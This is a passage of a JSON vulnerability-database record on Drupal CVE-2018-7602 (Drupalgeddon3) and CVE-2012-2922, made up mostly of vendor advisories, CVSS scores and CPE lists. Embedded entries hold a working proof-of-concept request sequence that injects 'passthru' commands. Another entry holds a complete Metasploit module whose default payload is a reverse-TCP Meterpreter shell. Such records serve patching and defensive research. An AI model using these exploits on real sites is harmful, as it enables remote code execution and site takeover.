10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-05-21T22:55:00", "id": "DEBIANCVE:CVE-2012-2922", "href": "https://security-tracker.debian.org/tracker/CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:24:02", "description": "\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\n<https://www.drupal.org/sa-core-2018-004>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-07-21T05:49:50", "id": "OSV:DSA-4180-1", "href": "https://osv.dev/vulnerability/DSA-4180-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:19:31", "description": "\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u19.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-07-21T05:52:07", "id": "OSV:DLA-1365-1", "href": "https://osv.dev/vulnerability/DLA-1365-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "cisa_kev", "title": "Drupal Core Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-13T00:00:00", "id": "CISA-KEV-CVE-2018-7602", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-26T23:27:05", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal < 7.58 - drupalgeddon3 
Authenticated Remote Code Execution (PoC) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30262", "href": "https://0day.today/exploit/description/30262", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n \r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n \r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n \r\nThis will display the result of the whoami command.\r\n \r\nPatch your systems!\r\nBlaklis\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30262", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-07T04:41:03", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-05-01T00:00:00", "type": "zdt", "title": "Drupal < 7.58 - Drupalgeddon3 Authenticated Remote Code Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-01T00:00:00", "id": "1337DAY-ID-30275", "href": "https://0day.today/exploit/description/30275", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 
'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = 
send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-05-07] #", "sourceHref": "https://0day.today/exploit/30275", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2020-04-06T22:40:25", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-01T00:09:00", "type": "f5", "title": "Drupal vulnerability CVE-2018-7602", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-09-13T17:57:00", "id": "F5:K59591931", "href": "https://support.f5.com/csp/article/K59591931", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-01-26T11:08:58", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core \u2013 Highly critical \u2013 Remote Code Execution \u2013 SA-CORE-2018-002. 
Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T00:00:00", "type": "attackerkb", "title": "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-21T00:00:00", "id": "AKB:4D0C3FF9-B5E6-4902-B9C8-DE71A77A30F2", "href": "https://attackerkb.com/topics/Joo9217ILF/drupal-core---highly-critical---remote-code-execution---sa-core-2018-004", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:36:38", "description": "A remote code execution vulnerability exists within multiple subsystems of\nDrupal 7.x and 8.x. This potentially allows attackers to exploit multiple\nattack vectors on a Drupal site, which could result in the site being\ncompromised. 
This vulnerability is related to Drupal core - Highly critical\n- Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this\nvulnerability are being exploited in the wild.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=896701>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7602", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-07-19T00:00:00", "id": "UB:CVE-2018-7602", "href": "https://ubuntu.com/security/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:30:08", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and\nearlier allows remote attackers to obtain sensitive information via the q[]\nparameter to index.php, which reveals the installation path in an error\nmessage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | installation path is known when using distribution packages\n", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": 
"ubuntucve", "title": "CVE-2012-2922", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-05-21T00:00:00", "id": "UB:CVE-2012-2922", "href": "https://ubuntu.com/security/CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2018-06-26T22:15:29", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\r\n\r\nUpdated \u2014 this vulnerability is being exploited in the wild.\r\n\r\n#### Poc\r\nThis is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. 
Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n```\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n ```\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with :\r\n ```\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n````\r\n \r\nThis will display the result of the whoami command.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7602)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "SSV:97246", "href": "https://www.seebug.org/vuldb/ssvid-97246", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:38:40", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. 
Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "cve", "title": "CVE-2018-7602", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-20T12:52:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:26:36", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message.", "cvss3": {}, "published": "2012-05-21T22:55:00", "type": "cve", "title": 
"CVE-2012-2922", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:drupal:drupal:5.22", "cpe:/a:drupal:drupal:5.10", "cpe:/a:drupal:drupal:5.18", "cpe:/a:drupal:drupal:5.20", "cpe:/a:drupal:drupal:7.12", "cpe:/a:drupal:drupal:6.2", "cpe:/a:drupal:drupal:6.1", "cpe:/a:drupal:drupal:6.5", "cpe:/a:drupal:drupal:5.16", "cpe:/a:drupal:drupal:6.18", "cpe:/a:drupal:drupal:6.10", "cpe:/a:drupal:drupal:5.21", "cpe:/a:drupal:drupal:6.6", "cpe:/a:drupal:drupal:5.4", "cpe:/a:drupal:drupal:6.17", "cpe:/a:drupal:drupal:7.5", "cpe:/a:drupal:drupal:5.1", "cpe:/a:drupal:drupal:6.4", "cpe:/a:drupal:drupal:5.3", "cpe:/a:drupal:drupal:5.15", "cpe:/a:drupal:drupal:5.5", "cpe:/a:drupal:drupal:6.3", "cpe:/a:drupal:drupal:5.19", "cpe:/a:drupal:drupal:7.6", "cpe:/a:drupal:drupal:5.9", "cpe:/a:drupal:drupal:6.16", "cpe:/a:drupal:drupal:6.14", "cpe:/a:drupal:drupal:5.8", "cpe:/a:drupal:drupal:7.10", "cpe:/a:drupal:drupal:7.1", "cpe:/a:drupal:drupal:5.13", "cpe:/a:drupal:drupal:6.0", "cpe:/a:drupal:drupal:6.15", "cpe:/a:drupal:drupal:7.14", "cpe:/a:drupal:drupal:6.11", "cpe:/a:drupal:drupal:6.7", "cpe:/a:drupal:drupal:5.6", "cpe:/a:drupal:drupal:7.8", "cpe:/a:drupal:drupal:5.23", "cpe:/a:drupal:drupal:6.9", "cpe:/a:drupal:drupal:5.0", "cpe:/a:drupal:drupal:7.4", "cpe:/a:drupal:drupal:7.11", "cpe:/a:drupal:drupal:6.8", "cpe:/a:drupal:drupal:5.14", "cpe:/a:drupal:drupal:7.9", "cpe:/a:drupal:drupal:6.12", "cpe:/a:drupal:drupal:5.2", 
"cpe:/a:drupal:drupal:7.2", "cpe:/a:drupal:drupal:5.7", "cpe:/a:drupal:drupal:5.12", "cpe:/a:drupal:drupal:5.11", "cpe:/a:drupal:drupal:6.13", "cpe:/a:drupal:drupal:5.17", "cpe:/a:drupal:drupal:7.3", "cpe:/a:drupal:drupal:7.7", "cpe:/a:drupal:drupal:7.0"], "id": "CVE-2012-2922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:drupal:drupal:6.18:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.13:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.16:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.20:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.8:*:*:*:*:*:*:*", 
"cpe:2.3:a:drupal:drupal:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.15:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.18:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.19:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.17:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.17:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.10:*:*:*:*:*:*:*", 